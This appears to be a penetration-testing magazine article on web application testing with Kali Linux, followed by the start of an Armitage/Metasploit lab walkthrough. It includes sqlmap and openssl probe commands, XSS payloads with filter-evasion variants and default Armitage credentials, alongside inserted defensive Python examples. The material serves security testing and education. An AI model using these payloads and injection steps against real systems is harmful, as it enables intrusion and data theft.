Of course before installing and using Kali, it needs to be downloaded first, and anyone can get Kali Linux from http://www.kali.org/downloads/. On the Kali website, one will find many versions or flavors of Kali Linux, so it is up to the individual to get the flavor he/she wishes. Kali Linux, like its predecessor, is completely free and always will be. No one will ever have to pay for Kali Linux. According to the documentation, Kali has been developed to adhere to the Filesystem Hierarchy Standard (FHS), allowing all Linux users to easily locate binaries, support files, libraries, etc. Kali Linux has been built to support as many wireless devices as possible, allowing it to run properly on a wide variety of hardware and making it compatible with numerous USB and other wireless devices.

As we all know, web applications are no doubt the most widespread attack vectors because most of them are connected to the Internet. Almost every organization today has some kind of web presence, and more often than not, that web presence is dynamic and user-driven. Many of today's websites and applications contain complex coding with backend database-driven transactions and multiple layers of authentication. The new trend is that organizations are also leveraging the power of an executable web. Online banking, shopping, and social media are now commonplace because everything is interconnected. In many ways, the Internet is like the new wild west and at the same time a new small village which brings everyone closer to one another. As technology advances, the demand for new cool things about technology gets higher and higher. Consequently, people rush to push everything to the internet and web applications, which creates new vulnerabilities and exposure for hackers.

Jeff Bezos, the CEO and founder of Amazon.com, once narrated an anecdote about what he thought to be his favorite software vulnerability in the early days of Amazon.com's existence. The issue was that when selecting an item to purchase, the end-user could enter into a text box the number of such items they wanted to order. The customer could also enter a negative number, and Amazon.com would automatically credit the customer's account. And because we're dealing with products, services, and ultimately a lot of cash, web application vulnerabilities can lead to serious issues. So this piece of writing will allow web application developers, application owners and security professionals to have a good understanding of the technical details and methodology behind web attacks using tools in Kali Linux.

The first step in web application testing with Kali Linux is to gather a high-level understanding of the target web application. To do that, the tester needs to ask the following questions: Is there a special client necessary to connect to the application? What transports does it use? Over which ports? How many servers are there? Is there a load balancer? What is the platform of the Web server? Are external sites relied on for some functionality?

The answers to these questions should be a piece of cake if and only if the tester is equipped with Kali Linux, which has abundant tools that allow you to get information about the target. First, let's begin with profiling our target by finding out which registrar handles the domains of the target organization. Profiling the target using whois is shown in Figure 2.

Figure 2. Whois in Kali

The good news is that Mantra, which is a browser especially designed for web application security testing and part of the Kali tool set, is very useful when it comes to profiling and enumeration. Mantra has many built-in tools for information gathering and finding documents that belong to the target organization.

Figure 3. Mantra in Kali Linux

Before beginning the platform enumeration, the tester needs to find out which port the web server is using. This process is called service discovery, and it is carried out using port scanning for a list of common Web server ports. Tools like Nmap and Netcat can be very handy when it comes to scanning and banner grabbing. Figure 4 and Figure 5 show nmap commands for getting information about the service description and port.

Figure 4. Service Discovery Using Nmap

Figure 5. Server Version

For connecting to Secure Socket Layer (SSL) services, OpenSSL is favorable for port 443 banner enumeration. As a security engineer you need to keep in mind that the most transparent and obvious features of a Web application that a malicious attacker will identify and exploit are vulnerabilities in the Web server software such as IIS, Apache, and Netscape. So no matter the sturdiness of the design, there is no application that can stand for very long on a vulnerable web server platform.

Figure 6. OpenSSL For SSL Port

echo -e "HEAD / HTTP/1.0\n\n" | openssl s_client -quiet -connect TargetHost:443

SSL and Transport Layer Security (TLS) are protocols that provide secure channels for the protection, confidentiality, and authentication of the information traversing the wire. Considering the criticality of these security implementations, it is important to verify the usage of a strong cipher algorithm and its proper implementation. In order to detect possible support of weak ciphers, the ports linked to SSL/TLS services must be identified. When accessing a web application via the https protocol, a secure channel is established between the client and the server. The identity of one party (the server) or of both client and server is then established by means of digital certificates. In order for the communication to happen, a number of safety checks on the certificates must be passed.

Kali has tools that can be used to identify weak ciphers. Kali Linux has many tools, such as sslscan and tlssled, handy for identifying weak ciphers. One of my coworkers, Shawn Evans, Senior Penetration Tester at Knowledge Consultant Group (KCG), has published an SSL scanner tool called SSLSnake that is very powerful. SSLSnake can be downloaded from the following link: https://code.google.com/p/sslsnake/downloads/list. Figure 7 shows the usage of the SSLSnake script. TLSSLed is another tool for scanning weak ciphers, as shown in Figure 8.

Figure 7. Weak Ciphers Identification Using SSLSnake
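Whichever scanner produces the cipher list, the decision of what counts as weak is the same, and it is worth having that rule set written down so it can be applied to a server's configured suite list as well as to scan output. The following is an added example, not the article's code nor that of sslscan, tlssled or SSLSnake: the classification rules and the sample list of offered suites are assumptions chosen for the example, and `local_default_suites` just reads what the local OpenSSL build offers through Python's ssl module.

```python
"""Weak-cipher triage for a TLS configuration (added example, not the
article's code or any of the tools it names).

Flags the classes the openssl checks above probe for: EXPORT, NULL and
anonymous suites, obsolete ciphers (RC4, DES/3DES) and the MD5 MAC.
WEAK_RULES and SAMPLE_OFFERED are assumptions made for this example.
"""
import re
import ssl

# (regex on the OpenSSL suite name, reason reported)
WEAK_RULES = [
    (r"^EXP|EXPORT", "export-grade key length"),
    (r"NULL", "no encryption or no authentication"),
    (r"^ADH|^AECDH|anon", "anonymous key exchange, no server authentication"),
    (r"RC4", "RC4 stream cipher"),
    (r"(^|-)DES-|3DES|DES-CBC3", "DES / 3DES block cipher"),
    (r"MD5", "MD5 MAC"),
]


def weak_reasons(name):
    """Every reason a cipher suite name is considered weak ([] if none)."""
    return [why for pat, why in WEAK_RULES if re.search(pat, name)]


def audit_suites(names):
    """Split suite names into (accepted list, {weak name: [reasons]})."""
    ok, weak = [], {}
    for n in names:
        reasons = weak_reasons(n)
        if reasons:
            weak[n] = reasons
        else:
            ok.append(n)
    return ok, weak


def local_default_suites():
    """Suite names the local OpenSSL offers under Python's default context."""
    ctx = ssl.create_default_context()
    return [c["name"] for c in ctx.get_ciphers()]


# Constructed sample: what a permissively configured server might advertise.
SAMPLE_OFFERED = [
    "ECDHE-RSA-AES128-GCM-SHA256",
    "AES256-SHA",
    "EXP-RC4-MD5",
    "NULL-SHA",
    "ADH-AES128-SHA",
    "DES-CBC3-SHA",
    "RC4-SHA",
]

if __name__ == "__main__":
    ok, weak = audit_suites(SAMPLE_OFFERED)
    for name, reasons in weak.items():
        print(f"WEAK  {name:30s} {'; '.join(reasons)}")
    for name in ok:
        print(f"ok    {name}")
    local = local_default_suites()
    print(f"local default context: {len(local)} suites, "
          f"{len(audit_suites(local)[1])} flagged")
```

The rules match on OpenSSL's suite naming, which is what `openssl s_client -cipher` and the scanners above print; a suite can collect several reasons, as `EXP-RC4-MD5` does, and an empty list is what a hardened configuration should return for every suite it offers.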



Figure 8. Weak Ciphers Identification with tlssled

# openssl s_client -connect Targethost:443 -cipher EXPORT40
# openssl s_client -connect Targethost:443 -cipher NULL
# openssl s_client -no_tls1 -no_ssl3 -connect targethost:443
# ./sslSnake.py -h target -low ssl2 -v

There are many published vulnerabilities out there depending on the web server platform. The Exploit Database website allows a tester or hacker to search for Common Vulnerabilities and Exposures (CVEs) or through the Open Sourced Vulnerability Database (OSVDB). CVEs are publicly certified information security vulnerabilities or exposures. Essentially, security vulnerabilities or exposures discovered by hackers and security engineers are put forward to a candidate naming authority (CAN). Afterward, the vulnerability gets verified and assigned a number. So searching for vulnerabilities in the Exploit Database website (Long Slash Directory Listing, ISAPI DLL Source Disclosure, etc.) on the web server is a good starting point. It should be noted that not all software vendors publish vulnerabilities publicly, and therefore these bugs are not recorded within public vulnerability databases. This information is only revealed to customers or published through fixes that do not come with advisories. So using the searchsploit tool in Kali, a tester can search for and discover many published vulnerabilities. Figure 9 and Figure 10 show the reader how to launch and search for vulnerabilities in the public database.

Figure 9. Searching for Vulnerability

Figure 10. Using Searchsploit in Kali

OpenVAS, which is another handy tool in Kali, can be used to identify vulnerabilities on the web server. OpenVAS is a collection of integrated security tools and services that offer a powerful platform for vulnerability management. It has been developed on the basis of a client-server architecture, where the client requests a specific set of network vulnerability tests against its target from the server. Its modular and robust design allows the tester to run the security tests in parallel, and it is available for a number of operating systems. Figures 11-13 show the tester how to initiate and log in to the OpenVAS web interface.

Figure 11. Starting OpenVas

Figure 12. Login to OpenVas

Figure 13. OpenVas Vulnerabilities Web Interface

At this point the tester can fire up a web scanner and vulnerability identification using many tools listed under the Web Applications category in Kali, such as arachni, owasp-zap, w3af, websecurify or Wapiti. Another useful tool in Kali Linux is owasp-zap, which is an integrated testing tool for discovering vulnerabilities in web applications. owasp-zap is shown in Figure 14. Figure 15 illustrates the rich and powerful WebScarab web interface.

Figure 14. OWASP-ZAP

Figure 15. WebScarab

Afterward, the tester can begin to map the entire Web application and gather enough data for the analysis. The goal is to retrieve all the possible information from the Web application and organize it in some structured way. The outcome of this process will give us a Web application map organized into functional groups. While mapping the entire web application, the tester needs to ask himself the following questions: Does this page or something on the application talk to a database, or another system? If the answer is yes, then the tester needs to start looking for SQL and LDAP. Can someone see what the end-user types? If the response is affirmative, then there will be a need to test for XSS. Does this page point to a local or remote file? If the answer is affirmative, then the tester has to test for Local/Remote File Includes.

Another recommended activity to do before surveying the application is to go to every page and link. Become accustomed to the application. Look at all the menus, watch the directory names in the URL change as you navigate. In essence, get a feel for the site. That should purge any tendency to mindlessly click through the web application when it comes time to seriously inspect the application. Web applications are complex because of the way they interact with other sites and applications. So they may contain a dozen files, or they may contain a dozen well-populated directories. Either way, writing down the application's structure is a good habit because it helps you track insecure pages and provides a good way to orchestrate an effective attack. The tester can begin to record the page name and full path to the page, and at the same time ask himself the following questions: does the page require some form of authentication? Does the page require SSL? The tester can also identify the different GET and POST arguments that are passed to the page and to a back-end database.

Keep in mind that it is always a good idea to check for obvious obfuscation like the ones below.

Hex 1234567E3136382E1234502E313A6F777617370753456 7817373776F72643A31353A3538
Base64 MTkyLjE2OC4xBYuicfKpvd2FzcHVzZXI6cGFzc3dvcmQ6MTU6NTg=
MD5 03c2fc7f0a809afd457120bd34dd40aaa

Identifying the type of obfuscation or hash may assist the tester in decoding some sensitive or useful data. In addition, it may be useful to enumerate the encoding in place from the format of the message. Furthermore, if both the format and obfuscation technique can be guessed, then brute-force attacks could be devised. Many tokens may include information such as user identification or server location address with an encoded portion. The good news is that Kali Linux has a tool called hash-identifier which recognizes the type of hash that is used. As shown in Figure 16, Hash Id is a handy tool for recognizing the hash used.

Figure 16. Hash Identifier

The tester can use lynx, which is a text-based Web browser found on many UNIX systems. It provides a quick way of navigating a site, although extensive JavaScript will inhibit it. You will find that one of its best uses is downloading specific pages. Figure 17 illustrates the usage of the lynx text-based browser.

Figure 17. Lynx Text-Based Web Browser

Sometimes there are unnecessary, readable, downloadable and hidden files on a web server, such as renamed, backup and old files, which are a huge source of information leakage. It is key to verify the presence of these files because they may contain parts of source code, installation paths as well as passwords for web applications and databases. The file extensions present in a web server or a web application make it possible to identify the technologies which compose the target application, for instance jsp, inc and asp extensions. File extensions can also expose additional systems connected to the application. It should be noted that include files often contain application variables and constants, database connection strings, or SQL statements. Using DirBuster in Kali, the tester can discover many sensitive and useful files on the web server. DirBuster is a multi-threaded Java application designed to brute force directory and file names on web or application servers. Often, what looks like a web server in a state of default installation is actually not, and has pages and applications hidden within. As shown in Figure 18, DirBuster is a very useful and easy-to-use tool.

Figure 18. DirBuster in Kali

Authentication and authorization play critical roles in the security of an application since all succeeding security decisions are typically made based on the identity established by the supplied credentials. A web application will typically require a user to enter a username and a passphrase to prove the user is who he says he is. Most types of web application authentication use usernames and passwords to authenticate a user. Although not the coolest, nicest and sexiest of the attacks, password guessing is the most effective technique to defeat Web authentication. So, assuming there is no flaw in the selection of the authentication protocol or its implementation, the most vulnerable piece of most authentication systems is user password selection. Password guessing is one of the methods to defeat web authentication. Kali Linux has many robust tools, such as Hydra and Medusa, for password guessing. My favorite brute-forcer is Hydra, which can be used to perform a dictionary attack against any target. Hydra works by allowing a tester to specify a target, and using the username and password lists it attempts to apply brute force to passwords by using various combinations of usernames and passwords from both lists. Hydra currently supports: TELNET, FTP, HTTP-GET, HTTP-HEAD, HTTPS-GET, HTTPS-HEAD, HTTP-PROXY, LDAP2, LDAP3, SMB, SMBNT, MS-SQL, MYSQL, POSTGRES, REXEC, RSH, RLOGIN, CVS, SNMP, SMTP-AUTH, SOCKS5, VNC, POP3, IMAP, NNTP, PCNFS, ICQ, SAP/R3, SSH2, Teamspeak, Cisco auth, Cisco enable, Cisco AAA. xHydra is Hydra with a GUI. This graphical interface is a good place for new pentesters to start practicing and then move to the command line. Figure 19 and Figure 20 show the usage of hydra on the terminal.

Figure 19. Hydra Usage in Kali

Figure 20. Hydra GUI (xHydra) in Kali

If the brute-force method is successful, the next step is to log into the application and see if you can gain horizontal privilege escalation, which refers to accessing a colleague's information, and vertical privilege escalation, which is accessing a more prominent user's information. The possible situations for authorization attacks grow with the amount of functionality in the application. In order to successfully launch a privilege escalation attack, the tester needs to identify the component of the application that tracks the user's identity and roles. This might be as easy as looking for your username in one of the following locations, or the authorization scheme might be based on cryptic values set by the server. As a tester you need to know what you're looking for in order to attack authorization. Because query strings in browsers are so easily modifiable, many Web application programmers prefer to use the POST method rather than GET with query strings.

In Kali Linux a tester can use curl, which is a fantastic tool for automating tests, any time you have determined that it is possible to change the profile and user identifier parameters in the URL in order to view someone else's profile (Figure 21).

Figure 21. Curl Usage in Kali

Input validation attacks endeavor to submit data which the web application does not expect to receive. In general, a web application will perform some type of sanity check on user input. This check tries to ensure that the data is useful and does not present any harm to the end-user as well as the web server. More important checks are necessary to prevent the data from crashing the server. Less thorough verifications are required if the data is only to be limited to a specific length. Using the burpsuite free version or owasp-zap as a proxy in Kali Linux, you can perform input validation attacks on any given application. Figure 22 shows that a tester can use burpsuite to test for input validation using Intruder.

Figure 22. Burp suite

Fuzzy analysis is a very critical application testing method used by many software and cyber security experts to test their applications against unexpected, invalid, and random sets of data inputs. This activity uncovers some of the major vulnerabilities in the web application which otherwise are not possible to discover. These include buffer overflows, format strings, code injections, denial of service, and many other types of vulnerabilities. There are different classes of fuzzers available under Kali Linux that can be used to test web applications. Any untrusted source of data input is considered to be insecure and inconsistent. For instance, the trust boundary between the web application and the end-user is changeable. Thus, all the information inputs should be fuzzed and validated against known and unknown vulnerabilities. Fuzzy analysis is a relatively simple and effective solution that can be incorporated into a security testing process. For this reason, it is also sometimes known as robustness testing or negative testing. There are many tools that can be utilized for fuzzing in Kali Linux. The tools include: powerfuzzer, wfuzz, owasp-zap, burpsuite. Figure 23 and Figure 24 show the fuzzer tools Powerfuzzer and Wfuzz.

Figure 23. Powerfuzzer in Kali

Figure 24. Wfuzz in Kali

Web applications present a lot of information, from general and financial to personal. Usually, users see only a nice graphic interface in front of them when they navigate, for instance, to pentestmagazine.com. End-users do not see, or do not pay attention to, the database sitting behind the scenes. Contrary to what many may believe, attackers are very interested in back-end databases, and most of the time the databases are their main target.

Numerous malicious attackers use a technique known as SQL Injection. SQL injection is an attack in which a web application's security is compromised by inserting a SQL query into the web application which performs operations on the underlying database. These operations are unintended by the application's developers and are usually malicious in nature. Attackers take full advantage of the fact that designers usually build SQL commands with parameters that are user supplied. SQL injection vulnerabilities occur whenever input is used in the building of an SQL query without being adequately constrained or sanitized. The use of dynamic SQL opens the door to these vulnerabilities. SQL injection allows an attacker to access the SQL servers and execute SQL code under the privileges of the user used to connect to the database. When database access is being put into operation, the end user may be asked for certain information, such as a username and password. In many cases, that input will be tested with an SQL query. If input checking is not done, or poorly done, an attacker may be able to use SQL injection to enter a string that includes both the user's name and another SQL query. In some cases, the input may even contain a full SQL statement that will be executed to do whatever the attacker wishes.

It is extremely crucial for a tester to comprehend the architecture and the technology infrastructure of the web application. The assessment tools provided in Kali measure the security of web applications and databases in a joint technology evaluation process. It means that some tools will exploit the web frontend in order to compromise the security of the backend database. The database analysis tools in Kali are selected based on their main functions and capabilities. This set of tools mainly deals with enumeration, password auditing and assessing the target with SQL injection attacks, thus allowing a tester or malicious person to review the weaknesses found in the frontend web application as well as the backend database. Kali Linux database tools include: SQLMap, SQL Ninja, BBQSQL, SQLsus. As Shawn Evans from KCG stated, "SQLMap is the Rolex of automated SQL injection tools." SQLMap is an advanced and automatic SQL injection tool. Its main purpose is to scan, detect, and exploit the SQL injection flaws for the given URL. It currently supports various database management systems (DBMS) such as MS-SQL, MySQL, Oracle, and PostgreSQL. SQLMap employs four unique SQL injection techniques; these include inferential blind SQL injection, UNION query SQL injection, stacked queries, and time-based blind SQL injection. Figure 25 and Figure 26 illustrate how to launch and use SQLMap with all the different options.

Figure 25. SQLMap in Kali

Figure 26. Using SQLMap in Kali

# ./sqlmap.py -u http://TargetHost/vurln.php?user=relax --dbs --dbms=mysql --threads=1

--threads: if you want to send more requests at the same time, a higher value is faster but it needs a good connection.
--technique=BEUSTQ: if you don't want to test all techniques because of noise or other reasons.
If nothing is found you can try to increase: --level=(1-5) --risk=(0-3)

SQL Ninja is another specialized tool built to target web applications that use MS-SQL Server on the backend and are vulnerable to SQL injection flaws. Its main function is to exploit the vulnerabilities by taking over the remote database server through an interactive command shell instead of just extracting the data out of the database.

Cross-site scripting, also known as XSS, is the process of injecting scripts into a web application. The injected script can be stored on the original web page and run or processed by each browser that visits the web application. This process occurs as if the malicious script were part of the page's code. Cross-site scripting is different from many other types of attacks as XSS focuses on attacking the client, not the server. Although the malicious script itself is stored on the web application, the actual goal is to get a client to execute the script and perform an action. As a tester, you should understand that there are numerous cross-site scripting attack vectors. Aside from simply entering code into an input box, malicious hyperlinks or scripts can also be embedded directly into websites or e-mails. Several e-mail clients today automatically render HTML e-mail. Usually, the malicious portion of a malicious URL will be obfuscated in an attempt to appear more legitimate. In its simplest form, conducting a cross-site scripting attack on a web application that does not perform input sanitization is easy. When you are only interested in providing proof that the system is vulnerable, you can use some basic JavaScript to test for the presence of XSS. Input boxes in the web applications are an excellent place to start. Rather than entering expected information into a textbox, a penetration tester should attempt to enter the script tag followed by a JavaScript alert directly into the field. The classic example of this test is listed below:

<script>alert(KCG)</script>
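The Hex, Base64 and MD5 tokens listed in the application-mapping section earlier can be triaged automatically before reaching for hash-identifier. The following is an added example, not the article's code nor hash-identifier's: the sample tokens are constructed here by encoding an invented "ip:user:hh:mm" string, and the hash classification is by length only, which is all that can be inferred from the string itself.

```python
"""Token triage for the Hex / Base64 / MD5 examples (added example, not the
article's code or hash-identifier).  SAMPLE_TOKENS are constructed from an
invented "ip:user:hh:mm" string; hashes are classified by length only."""
import base64
import binascii
import hashlib
import re
import string
import urllib.parse

_TEXT = "192.168.1.10:alice:15:58"   # constructed, not a real session value
SAMPLE_TOKENS = {
    "hex": _TEXT.encode().hex(),
    "base64": base64.b64encode(_TEXT.encode()).decode(),
    "md5": hashlib.md5(b"password").hexdigest(),
    "sha1": hashlib.sha1(b"password").hexdigest(),
    "url": "%3cSCRIPT%3e",
}
_PRINTABLE = set(string.printable) - {"\x0b", "\x0c"}
_HASH_LENGTHS = {32: "md5-like hash", 40: "sha1-like hash", 64: "sha256-like hash"}


def _as_text(raw):
    """Decoded bytes as str if they are all printable ASCII, else None."""
    try:
        s = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    return s if s and all(ch in _PRINTABLE for ch in s) else None


def classify_token(tok):
    """Return (kind, decoded_text_or_None).

    Hex is tried before base64 because every hex string is also made of
    base64 alphabet characters; a hex string that does not decode to text
    is reported as a hash when its length matches a common digest size.
    """
    t = tok.strip()
    if re.fullmatch(r"[0-9a-fA-F]+", t):
        if len(t) % 2 == 0:
            text = _as_text(bytes.fromhex(t))
            if text is not None:
                return ("hex", text)
        return (_HASH_LENGTHS.get(len(t), "hex"), None)
    if re.search(r"%[0-9A-Fa-f]{2}", t):
        return ("url-encoded", urllib.parse.unquote(t))
    if len(t) % 4 == 0 and re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", t):
        try:
            text = _as_text(base64.b64decode(t, validate=True))
        except binascii.Error:
            text = None
        return ("base64", text) if text is not None else ("base64 (undecodable)", None)
    return ("plain", t)


def split_fields(tok, sep=":"):
    """Fields of the decoded token, if it decodes to delimited text; this is
    where a user id or server address inside a token becomes visible."""
    _, text = classify_token(tok)
    return text.split(sep) if text and sep in text else []


if __name__ == "__main__":
    for name, tok in SAMPLE_TOKENS.items():
        print(f"{name:6s} {tok[:40]:42s} -> {classify_token(tok)}")
    print(split_fields(SAMPLE_TOKENS["base64"]))
```

The point for a reviewer of a session scheme is the `split_fields` result: when a token decodes to readable, delimited fields, it is an encoding rather than a hash, and the structure the article describes (user identification plus a server address) is exposed to anyone who holds the token.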



The tester can also use <scr%00ipt>XSS<scr%00ipt> or <scr/****/ipt>XSS<scr/****/ipt> in case the word script is blocked. If the script tag is being purged by the filter, the tester can use <scr<script>ipt>. Another technique is to encode the brackets around the script: %3cSCRIPT%3eXSS%3c/SCRIPT%3e. Lastly, the tester can turn the backslashes into comments:

\; XSS;//

Tools like WebScarab, Burp Proxy, XSSer and BeEF can be very handy when it comes to identifying cross site scripting. XSSer is an open source penetration testing tool that provides the facility of detecting and exploiting cross site scripting bugs on various web applications.

Figure 27. XSSer in Kali

Another useful tool when it comes to cross site scripting is BeEF. It is an acronym for Browser Exploitation Framework; it is used to collect many zombies and run a lot of exciting attacks on those zombies, which gives us a great environment because it does the hard work instead of you. The Browser Exploitation Framework (BeEF) is a powerful professional security tool. BeEF leads the way in techniques that provide the experienced penetration tester with practical client side attack vectors. Unlike other security frameworks, BeEF focuses on leveraging browser vulnerabilities to assess the security posture of a target.

Figure 28. BeEF Usage in Kali

In conclusion, information technology (IT) security is the discipline and art of protecting data in electronic format, and in order to safeguard sensitive and critical data a tester needs to have the right tools. As Sun Tzu stated, "If you know the enemy and know yourself, you need not fear the result of a hundred battles." However, I will say this: "If you know the web application and are armed with Kali Linux, you need not panic about compromising any web application."

Lamin Fatty
Senior Penetration Tester at Knowledge Consultant Group (KCG). He went to the University of Detroit Mercy where he earned a master's degree in Information Assurance/Cyber Security. He has many years of experience in Vulnerability Assessment, Penetration Testing, Information Assurance, and Networking. Presently, Lamin performs several tasks including: performing external and internal penetration tests and network vulnerability assessments to provide a comprehensive view of the client's network weaknesses that are exposed to threats; carrying out application vulnerability assessments to provide a good understanding of the different client application weaknesses that are exposed; identifying IT related risks throughout areas including perimeter, network, host, application, data and physical security; performing mobile application (iOS and Android) assessments to provide a clear view of the different client application weaknesses that are exposed; and hardening several databases including MSSQL, Oracle, MySQL, and PostgreSQL.
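The evasion payloads listed in the XSS section above are aimed at blacklist filters that purge the word or tag "script". The Python below is an added example, not code from the article: a constructed single-pass tag purge, an iterated version of it, and the alternative of HTML-encoding the output, each run over the article's own payloads. The filter functions are constructed stand-ins, not any real product's filter.

```python
import html
import re
import urllib.parse

# Constructed stand-in for a blacklist filter: purge literal <script> and </script>
# tags, case-insensitively, in a single pass. This is the kind of filter the
# article's <scr<script>ipt> payload is aimed at.
SCRIPT_TAG = re.compile(r"</?script>", re.IGNORECASE)


def naive_filter(value: str) -> str:
    """Single-pass tag purge: removing the inner <script> of <scr<script>ipt>
    reassembles a fresh <script> tag out of the leftovers."""
    return SCRIPT_TAG.sub("", value)


def iterative_filter(value: str) -> str:
    """Re-apply the purge until nothing changes. This closes the nested-tag hole
    but still passes every variant in which the literal tag never appears
    (null byte inside the tag name, comment inside the tag name)."""
    previous = None
    while previous != value:
        previous, value = value, SCRIPT_TAG.sub("", value)
    return value


def filter_then_decode(raw_param: str) -> str:
    """Wrong order of operations: filter the raw query-string value and URL-decode
    afterwards. The %3cSCRIPT%3e payload passes the filter untouched and is
    decoded into a live tag just before it reaches the page."""
    return urllib.parse.unquote(naive_filter(raw_param))


def decode_then_filter(raw_param: str) -> str:
    """Canonicalise first: once decoded, the tag is visible to the (still weak) filter."""
    return naive_filter(urllib.parse.unquote(raw_param))


def encode_for_html_body(value: str) -> str:
    """The defensive alternative: do not try to recognise attacks at all, just
    encode every character that carries meaning in an HTML body (<, >, &, quotes)
    so the browser renders the value as text."""
    return html.escape(value, quote=True)


def has_live_tag(rendered: str) -> bool:
    """True when the rendered text still contains an unencoded '<', i.e. the
    browser may treat part of it as markup rather than as text."""
    return "<" in rendered


# Constructed inputs built from the article's own payloads, URL-decoded as a
# web framework would deliver them to application code.
PAYLOADS = {
    "classic": "<script>alert('KCG')</script>",
    "nested": "<scr<script>ipt>alert('KCG')</script>",
    "null_byte": urllib.parse.unquote("<scr%00ipt>XSS<scr%00ipt>"),
    "comment": "<scr/****/ipt>XSS<scr/****/ipt>",
    "encoded": urllib.parse.unquote("%3cSCRIPT%3eXSS%3c/SCRIPT%3e"),
}


def survives(treatment) -> dict:
    """Map each payload name to whether markup survives the given treatment."""
    return {name: has_live_tag(treatment(p)) for name, p in PAYLOADS.items()}


if __name__ == "__main__":
    for fn in (naive_filter, iterative_filter, encode_for_html_body):
        print(f"{fn.__name__:22s} {survives(fn)}")
    print("filter then decode :", filter_then_decode("%3cSCRIPT%3eXSS%3c/SCRIPT%3e"))
    print("decode then filter :", decode_then_filter("%3cSCRIPT%3eXSS%3c/SCRIPT%3e"))
```

Only the encoding treatment leaves no markup for any payload; the two filters differ only in which of the article's variants get through.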



SCENARIOS

Penetration Testing
with Linux
Penetration testing with Linux is one of the best ways to perform
tests. It is a versatile tool. Linux comes in many flavors like
Backtrack5 RC3 or now Kali. Linux allows the customization of
the software itself plus the tools that you use. Therefore, the
customization and level of sophistication is limitless. This article
will cover using Backtrack5 RC3 and Armitage as it is executed
during the pentest.

This article may not cover all features of Armitage. However, in order to provide you a better understanding of Armitage, Kali will be used as well in different screenshots. Note that Armitage is no longer supported under Backtrack with the recent release of Kali in early 2013. We chose to use Kali in this article to show you something recent, but the other versions of Linux are still very good tools to use in the field.

Backtrack comes loaded with Metasploit and, as you know, in order to find and run an exploit you have to switch to the directory and run the commands specific to it. This is no longer the case with Kali: following the FHS (Filesystem Hierarchy Standard), Kali has taken care of this to make all commands system wide accessible from the command line. Armitage provides a nice GUI interface to Metasploit. It also has a dashboard which you can use for setting up the hosts or network you are going to target. You can import hosts from files associated with other networks which security assessment tools like Nessus, IP360, and Burp session XML produce. Armitage imports anything from a text or XML file. You can use some of the automation presented with Armitage. In addition, it is wise to use customized versions of these scripts when delivering a penetration test. You never really know what the outcome may be unless you test in a lab first. The great thing about Armitage is that it has a database of known vulnerabilities and attacks which you can draw into your test. This helps save time and keeps you focused, but not all exploits work as targets can be hardened. Customizing scripts and Linux has long been the core of these releases. Armitage can be used as a standalone tool as well as a network solution when working with other pentesters. There are a few reporting options that can be used with Backtrack or Kali to save your work and share results or progress. Armitage has its own place to store evidence in data format but not in a report format that would be all inclusive. This is what is called loot, where the results go.

Figure 1. Armitage Launching

Launching Armitage comes from navigating to the Applications menu item and following the terms Kali Linux > Exploitation Tools > Network Exploitation > Armitage (Figure 1). In this new installation of Kali, you will have to manually type the following commands in order to get Armitage to connect to the database. They are: service postgresql start and service metasploit start. Once these are entered, you can start Armitage successfully using the install default user name msf and password test (Figure 1).

Next there are a series of prompts that you will be directed to for launching and customizing port usage. Once Armitage is open, we can begin using it to scan for hosts or network subnets. Just launch Nmap (Figure 2) from within Armitage and choose to add a host or scan a network with several scripted choices. The rules are the same for using nmap in Armitage and by itself. There are aggressive scans and quieter scans, so choose wisely in order to remain quiet. The machines that we want to target are 10.10.10.5 and 10.10.10.7. One is a server hosting the core business application and the other is a typical user workstation. See Figure 3 below from the previous pentest run with Armitage on Backtrack5 RC3.

Figure 3. Note the lightning around Hosts = pwned

In the pentest shown here the machines' administrator accounts were known, in a white box test, to see if we could sniff traffic from the core business application. We are going to imitate an insider threat, or demonstrate going beyond passing the hash for Windows users in the network.

The following shows what we want to test. This is taken from a lab setup of a typical company that uses an earth materials management system. The network is made of Microsoft Windows machines, with Windows 7 for end users and Windows Server 2008 R2. The objective is to look for vulnerabilities on the host machines to see if we can capture data on the hosts going across the network to the server for corporate espionage.

Figure 2. Launching nmap within Armitage

The next step you want to do is to find vulnerabilities with a scan. This takes Armitage and scans the hosts out there, and it comes up with a proposed list of attacks. Now not each and every attack is going to work. It will give a type of technology to exploit. This, coupled with your experience and training, will then discover if it is or is not successful. This is where the pentester needs to be on their best game to find an exploit in which to launch a payload. The good thing about Armitage is that each exploit or payload that you try opens a new tab. So you can see what works, what doesn't and where to go next.

Now that we have our hosts found, targeted, and with an attack list, we can proceed. Since the machines were Windows based, we quickly went to this exploit to see if there was a way to pwn the boxes. In Armitage you can assign accounts to each host that are used to log in and run the payloads. We chose many exploits but we found only one that really works, and it will be addressed later. Below in Figure 3 you can see that when a system username and password are known and the Login > psexec is used, the lightning is seen all around it.

Test Core Business Application

Test core business application against:
Clear text traffic capturing
Man in the middle (MITM)
Spoofing
Armitage w/Meterpreter
DoS Slowloris

Port Scanning Results and Issues

Scanning Windows machines
The first test was scanning of services and ports on Microsoft devices. The test discovered the default Windows system ports open for unsigned SMB, telnet, and high ports. This included the port scanning by Nessus as well as the Microsoft Baseline Analyzer. The results from Nessus showed that there existed an unsigned SMB/Samba port (445) as well as the open clear text port channel (23). Nessus found only (1) medium and (1) low alert for the server 10.10.10.5. Port (135) on the workstation was found open, and that was used for remote procedure protocol. Port (139) was found open and used with SMB for file sharing with other devices beside Microsoft. Port (808) is the Streetsmarts Web based application running encrypted. Port (992) was found to be an SSL port
with a certificate error. Additional ports were found open ranging from (49152-49157) and were due to a release from Microsoft in January 2008 to start the open port range at (49152). Some P2P (peer-to-peer) file sharing has been known to run over these ports.

The possible attack that could have occurred but was not conducted in the test was escalation in privileges via an SMB vulnerability and brute forcing usernames and passwords. The attacker also could have social engineered the information from an unsuspecting user. There is a probability that this could have happened.

Armitage has the option for you to ask it what vulnerabilities and attacks could be possible on the chosen target. Just go to the host, select it and then go to the menu Attacks > Find Attacks. It will return a list of possible attacks and say Happy Hunting! Therefore, that is exactly what happened.

The following tools were used to test a vulnerability of unencrypted communication on the LAN (Local Area Network), with ettercap always being used for the MITM. They are SSLstrip, Dsniff, Driftnet, Urlsnarf, and meterpreter.

Technical Overview Sniffing MITM Attacks
